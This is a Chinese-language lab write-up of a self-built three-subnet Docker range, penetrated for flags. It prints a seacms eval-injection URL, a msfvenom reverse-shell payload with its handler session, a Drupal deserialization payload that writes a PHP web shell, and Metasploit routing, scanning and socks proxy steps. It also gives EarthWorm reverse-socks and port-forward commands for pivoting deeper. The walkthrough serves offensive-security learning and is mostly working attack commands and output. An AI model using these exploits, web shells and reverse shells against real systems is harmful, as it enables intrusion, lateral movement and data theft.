攻击机

192.168.190.1 windows

三层子网搭建

也就是说将两个服务起到默认网卡,然后一个映射出来一个不映射,那么不映射的就是在第二层子网,然后创建一个网卡,将第三个容器运行在新的网卡,然后将二层子网的容器连接过来,使它具有两个网卡。

靶机

http://192.168.190.128:11115/ seacms
http://172.17.0.2 drupal
http://172.29.0.10 普通web

渗透

首先从seacms入手,网上找了个命令执行的漏洞

1
http://192.168.190.128:11115/search.php?searchtype=5&tid=0&year=23334444);eval($_POST[1]);//

直接getshell,菜刀连接一下

执行命令find / -name flag
找到第一个flag

1
flag4{43faa418c66277e7661600d396bf604a}

因为内网有服务,直接msfvenom生成个马丢上去

1
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.190.1 lport=5555 -f elf -o shell.elf

windows:windows/meterpreter/reverse_tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 > use exploit/
[-] Failed to load module: exploit/
msf5 > Interrupt: use the 'exit' command to quit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 192.168.190.1
lhost => 192.168.190.1
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.190.1:5555
[*] Sending stage (857352 bytes) to 192.168.190.128
[*] Meterpreter session 1 opened (192.168.190.1:5555 -> 192.168.190.128:34932) at 2018-05-05 11:42:18 +0800

meterpreter >

看一下内网段

1
2
3
4
5
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0

添加路由扫一波内网

1
meterpreter > run autoroute -s 172.17.0.0
1
2
3
4
5
6
7
8
9
10
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.17.0.1-254
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,3306
msf5 auxiliary(scanner/portscan/tcp) > set threads 15
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.17.0.3: - 172.17.0.3:80 - TCP OPEN
[+][+] 172.17.0.4: - 172.17.0.4:3306 - TCP OPEN
[+] 172.17.0.4: - 172.17.0.4:80 - TCP OPEN
172.17.0.2: - 172.17.0.2:80 - TCP OPEN

msf直接添加socks4a代理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > options

Module options (auxiliary/server/socks4a):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.


Auxiliary action:

Name Description
---- -----------
Proxy


msf5 auxiliary(server/socks4a) > set srvport 8889
srvport => 8889
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) >
[*] Starting the socks4a proxy server

本地挂着代理访问,看到drupal,有个弱口令,直接登录

找到文章https://paper.seebug.org/334/?spm=a2c4e.11155515.0.0.tXzHPV

测试poc成功,在路径处拿到flag

1
DOCUMENT_ROOT 	/var/www/html/flag5{3be2a3b771431f2096ff984899869fa6}

现在利用写shell的漏洞

1
O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:41:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0filename\";s:65:\"/var/www/html/flag5{3be2a3b771431f2096ff984899869fa6}/p0desta.php\";s:52:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0storeSessionCookies\";b:1;s:36:\"\0GuzzleHttp\\Cookie\\CookieJar\0cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\0GuzzleHttp\\Cookie\\SetCookie\0data\";a:10:{s:4:\"Name\";s:3:\"aaa\";s:5:\"Value\";s:3:\"bbb\";s:6:\"Domain\";s:33:\"<?php eval(@$_POST[lemonaaa1]);?>\";s:4:\"Path\";s:1:\"/\";s:7:\"Max-Age\";N;s:7:\"Expires\";N;s:6:\"Secure\";b:0;s:7:\"Discard\";b:0;s:8:\"HttpOnly\";b:0;s:3:\"aaa\";s:3:\"bbb\";}}}s:39:\"\0GuzzleHttp\\Cookie\\CookieJar\0strictMode\";N;}

getshell。

因为网站在内网,使用代理工具是菜刀走socks4代理,连接

在/home/flag下找到flag6{5f4280194663fc90eca14aaa77bfdd55}

接下来渗透第三层子网,同样的操作,先丢个msf的马上去,查看下路由

1
2
3
4
5
6
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0
Local subnet: 172.29.0.0/255.255.0.0

相同的操作,扫内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,3306            
ports => 80,3306
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.29.0.1-254
rhosts => 172.29.0.1-254
msf5 auxiliary(scanner/portscan/tcp) > route print

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
172.17.0.0 255.255.255.0 Session 2
172.29.0.0 255.255.255.0 Session 4

[*] There are currently no IPv6 routes defined.
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.29.0.2: - 172.29.0.2:80 - TCP OPEN
[+] 172.29.0.10: - 172.29.0.10:80 - TCP OPEN
[+] 172.29.0.10: - 172.29.0.10:3306 - TCP OPEN

但是使用msf的时候会发现打第三层的时候并不稳地,所以这里使用EW来进行渗透操作。

这里先在本地起个监听服务,如果web服务是在外网的话在vps上起

1
ew_for_Win.exe -s rcsocks -l 8887 -e 1024 &

然后将ew传到服务器上执行

1
./ew_for_linux64 -s rssocks -d 192.168.190.1 -e 1024

其他操作的话一样,可以使用代理工具让其他软件走socks5代理,或者使用proxychains来进行渗透测试。

首先本地/VPS执行

1
2
3
.\ew_for_Win.exe -s lcx_listen -l 8885 -e 1026

将8885端口接受到的请求发送到1026端口

然后一层执行

1
2
3
./ew_for_linux64 -s lcx_slave -d 192.168.190.1 -e 1026 -f 172.17.0.2 -g 9999

打通192.168.190.1:1026和172.17.0.2:9999

然后二层执行

1
./ew_for_linux64 -s ssocksd -l 9999

这样就本地代理访问第三层了。